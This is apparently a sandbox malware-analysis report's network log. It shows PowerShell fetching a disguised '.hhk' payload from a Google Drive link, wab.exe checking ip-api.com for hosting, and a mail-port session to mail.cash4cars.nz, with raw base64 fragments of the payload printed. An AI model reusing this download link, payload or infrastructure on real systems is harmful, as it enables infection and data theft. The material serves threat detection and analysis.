                                                                            Apr 24, 2024 10:12:30.113173962 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.113212109 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.115988016 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.116045952 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.116058111 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.116102934 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.118725061 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.118786097 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.118792057 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.118838072 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.122476101 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.122536898 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.122545004 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.122586012 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.124125957 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.124185085 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.124191046 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.124232054 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.126785994 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.126847982 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.126856089 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.126895905 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.129498959 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.129559040 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.129565954 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.129606009 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.129609108 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.129653931 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.246644974 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.246673107 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:31.694792032 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:31.854711056 CEST8049739208.95.112.1192.168.2.4
                                                                            Apr 24, 2024 10:12:31.854814053 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:31.855104923 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:32.016282082 CEST8049739208.95.112.1192.168.2.4
                                                                            Apr 24, 2024 10:12:32.065933943 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:34.298790932 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:34.622926950 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:34.623879910 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:42.957237959 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:42.957433939 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.279277086 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.279443026 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.602442026 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.604485035 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.935251951 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.935285091 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.935303926 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.935348988 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.949999094 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:44.271620035 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:44.276571989 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:44.597843885 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:44.598202944 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:44.924799919 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:44.925123930 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:45.257594109 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:45.257843018 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:45.583123922 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:45.583332062 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:45.904441118 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:45.904625893 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.225508928 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.226077080 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.226232052 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.226258039 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.226284981 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.546879053 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.546906948 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.546925068 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.546937943 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.553307056 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.765247107 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:13:06.236426115 CEST8049739208.95.112.1192.168.2.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 24, 2024 10:11:58.927588940 CEST5975653192.168.2.41.1.1.1
                                                                            Apr 24, 2024 10:11:59.080928087 CEST53597561.1.1.1192.168.2.4
                                                                            Apr 24, 2024 10:11:59.896538973 CEST5091253192.168.2.41.1.1.1
                                                                            Apr 24, 2024 10:12:00.051047087 CEST53509121.1.1.1192.168.2.4
                                                                            Apr 24, 2024 10:12:31.535219908 CEST5106653192.168.2.41.1.1.1
                                                                            Apr 24, 2024 10:12:31.688788891 CEST53510661.1.1.1192.168.2.4
                                                                            Apr 24, 2024 10:12:33.690382957 CEST5379053192.168.2.41.1.1.1
                                                                            Apr 24, 2024 10:12:34.298051119 CEST53537901.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Apr 24, 2024 10:11:58.927588940 CEST192.168.2.41.1.1.10x1a6Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:11:59.896538973 CEST192.168.2.41.1.1.10x5228Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:12:31.535219908 CEST192.168.2.41.1.1.10x6aa4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:12:33.690382957 CEST192.168.2.41.1.1.10xb2ddStandard query (0)mail.cash4cars.nzA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Apr 24, 2024 10:11:59.080928087 CEST1.1.1.1192.168.2.40x1a6No error (0)drive.google.com142.251.2.101A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:11:59.080928087 CEST1.1.1.1192.168.2.40x1a6No error (0)drive.google.com142.251.2.100A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:11:59.080928087 CEST1.1.1.1192.168.2.40x1a6No error (0)drive.google.com142.251.2.102A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:11:59.080928087 CEST1.1.1.1192.168.2.40x1a6No error (0)drive.google.com142.251.2.113A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:11:59.080928087 CEST1.1.1.1192.168.2.40x1a6No error (0)drive.google.com142.251.2.138A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:11:59.080928087 CEST1.1.1.1192.168.2.40x1a6No error (0)drive.google.com142.251.2.139A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:12:00.051047087 CEST1.1.1.1192.168.2.40x5228No error (0)drive.usercontent.google.com142.251.2.132A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:12:31.688788891 CEST1.1.1.1192.168.2.40x6aa4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                            Apr 24, 2024 10:12:34.298051119 CEST1.1.1.1192.168.2.40xb2ddNo error (0)mail.cash4cars.nz114.142.162.17A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            • ip-api.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449739208.95.112.1805440C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Apr 24, 2024 10:12:31.855104923 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                            Host: ip-api.com
                                                                            Connection: Keep-Alive
                                                                            Apr 24, 2024 10:12:32.016282082 CEST175INHTTP/1.1 200 OK
                                                                            Date: Wed, 24 Apr 2024 08:12:31 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 6
                                                                            Access-Control-Allow-Origin: *
                                                                            X-Ttl: 60
                                                                            X-Rl: 44
                                                                            Data Raw: 66 61 6c 73 65 0a
                                                                            Data Ascii: false


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449730142.251.2.1014436912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-24 08:11:59 UTC215OUTGET /uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-04-24 08:11:59 UTC1582INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Wed, 24 Apr 2024 08:11:59 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy: script-src 'nonce-Sr3LUsIQEdBcIvVO4vFjiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449731142.251.2.1324436912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-04-24 08:12:00 UTC233OUTGET /download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-04-24 08:12:01 UTC4755INHTTP/1.1 200 OK
                                                                            X-GUploader-UploadID: ABPtcPrg97w8dR2sPlRXTnNXn4DJNm_eAgXUxUvmvbtkUO3K88v4Yv-vxqeTy5JC859E2WWm3uw
                                                                            Content-Type: application/octet-stream
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="Forretningsbaserede.hhk"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 500988
                                                                            Last-Modified: Wed, 24 Apr 2024 00:58:03 GMT
                                                                            Date: Wed, 24 Apr 2024 08:12:01 GMT
                                                                            Expires: Wed, 24 Apr 2024 08:12:01 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=6TLTQA==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            2024-04-24 08:12:01 UTC4755INData Raw: 36 77 4a 4e 47 2b 73 43 59 69 53 37 43 70 4d 62 41 4f 73 43 6e 71 52 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 53 64 75 63 67 39 78 41 5a 74 78 41 5a 75 42 38 5a 2f 61 70 52 52 78 41 5a 76 72 41 68 41 6c 67 63 46 49 53 79 6a 6b 36 77 4c 34 58 2b 73 43 4c 70 31 78 41 5a 74 78 41 5a 75 36 2b 67 53 49 71 75 73 43 6d 6c 6e 72 41 6f 5a 52 36 77 4a 64 73 2b 73 43 57 32 55 78 79 6e 45 42 6d 2b 73 43 4e 50 32 4a 46 41 76 72 41 6a 53 6f 36 77 4a 6c 68 74 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4a 66 6c 58 45 42 6d 34 48 35 74 73 38 38 41 33 7a 4b 63 51 47 62 63 51 47 62 69 30 51 6b 42 4f 73 43 6f 4c 6c 78 41 5a 75 4a 77 2b 73 43 51 44 64 78 41 5a 75 42 77 33 49 67 6d 77 4c 72 41 69 34 4d 36 77 49 30 61 4c 72 4d 37 77 31 5a 63 51 47 62 63 51 47
                                                                            Data Ascii: 6wJNG+sCYiS7CpMbAOsCnqRxAZsDXCQEcQGbcQGbuSducg9xAZtxAZuB8Z/apRRxAZvrAhAlgcFISyjk6wL4X+sCLp1xAZtxAZu6+gSIqusCmlnrAoZR6wJds+sCW2UxynEBm+sCNP2JFAvrAjSo6wJlhtHicQGbcQGbg8EE6wJflXEBm4H5ts88A3zKcQGbcQGbi0QkBOsCoLlxAZuJw+sCQDdxAZuBw3IgmwLrAi4M6wI0aLrM7w1ZcQGbcQG
                                                                            2024-04-24 08:12:01 UTC4755INData Raw: 68 42 50 67 62 74 75 59 44 33 35 70 68 5a 54 34 67 54 57 59 6d 7a 71 6a 56 6a 32 4a 64 43 6a 77 67 54 52 64 63 58 6c 58 64 62 30 54 41 2b 56 6f 6a 64 58 56 65 42 4d 36 2f 47 6a 70 65 54 4f 58 5a 64 70 6a 48 73 64 61 68 6b 64 67 33 42 35 31 32 6e 63 77 43 6e 61 69 7a 39 77 6a 6c 57 36 65 66 42 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 44 41 6f 62 39 53 50 48 4b 47 62 68 56 39 78 47 79 6f 49 37 75 68 34 4d 6d 68 76 68 56 2f 33 6f 2f 4a 48 71 37 46 4e 51 6c 52 46 4e 79 72 77 53 58 34 79 56 35 30 31 5a 6a 79 48 6c 42 67 39 68 6c 6f 53 68 37 4f 6d 35 32 71 33 4c 4e 4b 32 7a 42 74 39 52 45 65 52 43 55 46 68 36 47 39 6f 74 34 73 2b 54 45 6c 2b 79 55 77 64 76 58 6b 30 4d 51 38 6c 75 4a 2f
                                                                            Data Ascii: hBPgbtuYD35phZT4gTWYmzqjVj2JdCjwgTRdcXlXdb0TA+VojdXVeBM6/GjpeTOXZdpjHsdahkdg3B512ncwCnaiz9wjlW6efBlRgobpUYKG6VGChulRgobpUYKG6VGChulRgobpUDAob9SPHKGbhV9xGyoI7uh4MmhvhV/3o/JHq7FNQlRFNyrwSX4yV501ZjyHlBg9hloSh7Om52q3LNK2zBt9REeRCUFh6G9ot4s+TEl+yUwdvXk0MQ8luJ/
                                                                            2024-04-24 08:12:01 UTC433INData Raw: 57 58 4a 69 43 51 42 69 42 56 6f 48 2b 32 53 74 57 6e 6b 77 4a 74 6f 53 69 6c 59 39 49 54 42 52 33 76 50 38 71 4a 4b 57 48 38 64 36 59 78 44 53 65 2b 74 37 57 58 4f 55 46 49 38 77 37 34 32 63 4f 75 6e 38 72 62 63 63 51 44 64 4e 43 34 4e 65 50 6c 43 71 69 34 4e 33 70 67 78 35 39 4c 35 64 33 39 42 62 74 55 59 42 72 38 62 52 71 78 74 56 56 52 72 37 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 4f 4b 74 56 43 55 52 70 46 4f 6a 56 69 35 56 6b 57 6d 67 67 53 5a 35 52 65 30 77 47 32 6a 65 66 65 76 41 67 53 41 58 4e 33 34 33 56 6b 6c 4f 65 36 36 6b 67 53 47 74 6e 54 74 54 64 63 6d 61 32 57 64 4d 5a 44 5a 41 39 77 54 57 42 65 34 57 70 4b 57 31 59 5a 30 47 61 31 75 4c 4e 7a 59 58 4a 34 63 45 43 75
                                                                            Data Ascii: WXJiCQBiBVoH+2StWnkwJtoSilY9ITBR3vP8qJKWH8d6YxDSe+t7WXOUFI8w742cOun8rbccQDdNC4NePlCqi4N3pgx59L5d39BbtUYBr8bRqxtVVRr7pUYKG6VGChulRgobpUYKG6VGChulRgobpUYKG6OKtVCURpFOjVi5VkWmggSZ5Re0wG2jefevAgSAXN343VklOe66kgSGtnTtTdcma2WdMZDZA9wTWBe4WpKW1YZ0Ga1uLNzYXJ4cECu
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 35 57 63 32 58 76 37 79 57 34 2f 69 7a 79 6f 6e 6b 63 6b 33 2b 63 77 75 6c 62 49 2f 2b 45 79 34 67 6b 64 63 4e 62 36 42 7a 55 32 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 79 30 38 33 63 79 77 77 4a 72 67 71 68 75 67 39 68 54 76 64 31 61 4b 34 56 47 41 6f 52 41 4b 54 72 6e 31 6e 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 44 49 44 37 54 50 54 42 77 6a 74 58 4b 32 55 65 73 55 75 56 5a 67 6f 58 61 6e 2b 74 79 55 50 63 4f 64 30 4a 70 65 4f 78 76 64 76 67 64 75 59 41 42 6c 4a 52 4a 51 79 6c 46 68 68 76 41 4c 67 31 42 4d 6e 44 51 39 35 48 79 59 4a 35 53 4f 4f 30 31 4f 6a 44 73 32 79 79 6b 56 5a 4f 54 73 42 6c 58 44 63 5a
                                                                            Data Ascii: 5Wc2Xv7yW4/izyonkck3+cwulbI/+Ey4gkdcNb6BzU2ChulRgobpUYKG6VGChulRgobpUYKG6VGChulRgy083cywwJrgqhug9hTvd1aK4VGAoRAKTrn1nYKG6VGChulRgobpUYKG6VGChulRgobpUYKG6VGDID7TPTBwjtXK2UesUuVZgoXan+tyUPcOd0JpeOxvdvgduYABlJRJQylFhhvALg1BMnDQ95HyYJ5SOO01OjDs2yykVZOTsBlXDcZ
                                                                            2024-04-24 08:12:01 UTC68INData Raw: 39 62 2f 54 58 6f 75 4a 55 42 51 47 73 51 71 4d 5a 32 4c 59 5a 50 34 49 48 6f 59 45 71 51 44 50 2f 61 4a 30 6b 34 4d 47 55 73 6a 59 43 36 63 76 75 71 53 6d 32 59 69 33 39 43 75 7a 6f 6a 31 6e 39 50 71 61
                                                                            Data Ascii: 9b/TXouJUBQGsQqMZ2LYZP4IHoYEqQDP/aJ0k4MGUsjYC6cvuqSm2Yi39Cuzoj1n9Pqa
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 4b 61 38 51 41 6c 46 71 53 5a 2f 7a 42 4f 4d 44 45 59 38 58 4a 62 67 6a 75 56 6b 51 38 65 56 4f 46 51 6b 47 49 4d 78 6a 75 6c 2b 4d 77 7a 56 75 46 51 4e 4e 74 61 35 2b 72 49 36 55 47 37 58 50 33 48 50 35 55 51 76 72 4b 35 78 63 52 47 53 6b 30 55 78 2b 6f 6d 43 42 37 49 30 6a 44 68 33 33 6b 65 43 54 78 2b 5a 74 67 2f 73 38 45 31 73 2f 62 42 55 67 4e 74 78 7a 2b 46 4f 4a 6c 69 44 65 76 6d 74 67 4c 65 4f 46 79 38 73 79 42 4d 6d 49 49 75 4f 4e 57 4f 57 67 49 79 4d 53 69 6b 73 73 4f 63 31 41 37 46 6d 55 71 4a 62 71 53 34 76 36 36 41 61 55 54 32 7a 57 49 36 38 67 54 37 63 4e 78 76 6f 75 4a 49 38 74 46 58 4a 78 65 67 6e 32 72 59 64 77 44 65 36 7a 49 4b 36 53 54 4b 56 57 43 68 36 65 2f 6f 2b 73 38 6b 34 56 4a 61 61 34 54 53 4f 36 64 36 6a 37 6d 57 34 56 4c 31 57
                                                                            Data Ascii: Ka8QAlFqSZ/zBOMDEY8XJbgjuVkQ8eVOFQkGIMxjul+MwzVuFQNNta5+rI6UG7XP3HP5UQvrK5xcRGSk0Ux+omCB7I0jDh33keCTx+Ztg/s8E1s/bBUgNtxz+FOJliDevmtgLeOFy8syBMmIIuONWOWgIyMSikssOc1A7FmUqJbqS4v66AaUT2zWI68gT7cNxvouJI8tFXJxegn2rYdwDe6zIK6STKVWCh6e/o+s8k4VJaa4TSO6d6j7mW4VL1W
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 45 6b 76 31 45 75 37 58 4b 78 49 45 76 69 30 38 4e 71 35 4e 50 6a 4c 58 79 41 38 38 7a 2f 37 6b 35 46 31 45 46 4c 48 72 54 4e 41 63 42 76 6b 54 4f 4a 73 73 2f 34 37 59 45 51 4e 49 50 74 6f 38 51 4b 6f 4a 31 34 62 59 55 53 4b 37 38 5a 56 6a 61 57 4b 4f 61 54 55 59 75 77 30 4d 30 77 42 52 79 6d 69 6b 34 6f 4d 6b 71 55 49 4d 59 6a 50 52 6c 36 70 2f 4d 56 46 52 53 36 6c 33 6f 78 30 31 4d 46 4a 5a 74 56 74 4f 55 43 72 4e 6a 75 64 54 2b 4c 56 56 49 57 54 61 65 55 59 4f 32 42 45 49 74 48 67 75 61 36 36 52 75 6d 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 63 35 4c 45 32 59 69 62 79 68 4f 68 5a 31 4a 57 66 42 32 33 58 68 32 58 7a 56 73 35 63 6d 44 68 32 75 45 77 35 58 4c 55 6d 33 51 6d 63 58 42
